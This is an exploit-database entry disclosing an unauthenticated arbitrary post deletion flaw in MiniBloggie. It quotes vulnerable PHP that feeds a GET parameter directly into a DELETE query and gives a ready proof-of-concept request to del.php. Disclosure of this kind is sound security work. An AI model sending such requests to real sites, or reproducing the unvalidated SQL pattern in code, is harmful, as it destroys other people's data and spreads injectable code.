header-logo
Suggest Exploit
vendor:
MiniBloggie
by:
Cod3rZ
7.5
CVSS
HIGH
Arbitrary Delete Post
20
CWE
Product Name: MiniBloggie
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

MiniBloggie Arbitrary Delete Post Vulnerability

The MiniBloggie application is vulnerable to an arbitrary delete post vulnerability. An attacker can delete any post from the application by sending a crafted HTTP request to the del.php page with the post_id parameter set to the ID of the post to be deleted and the confirm parameter set to yes.

Mitigation:

The application should validate user input and ensure that only authorized users can delete posts.
Source

Exploit-DB raw data:

# MiniBloggie Arbitrary Delete Post Vulnerability
# Author: Cod3rZ
# Site: http://cod3rz.helloweb.eu
# PoC:
#  if (isset($_GET['post_id'])) $post_id = $_GET['post_id'];
#  if (isset($_GET['confirm'])) $confirm = $_GET['confirm'];
# [...]
# elseif ($confirm=="yes") {
# [...]
# $sql = "DELETE FROM blogdata WHERE post_id=$post_id";
# $query = mysql_query($sql) or die("Cannot query the database.<br>" . mysql_error());
# Vuln: http://site/del.php?post_id=[postid]&confirm=yes
# Ex:   http://127.0.0.1/del.php?post_id=1&confirm=yes
# Visit http://devilsnight.altervista.org

# milw0rm.com [2008-05-08]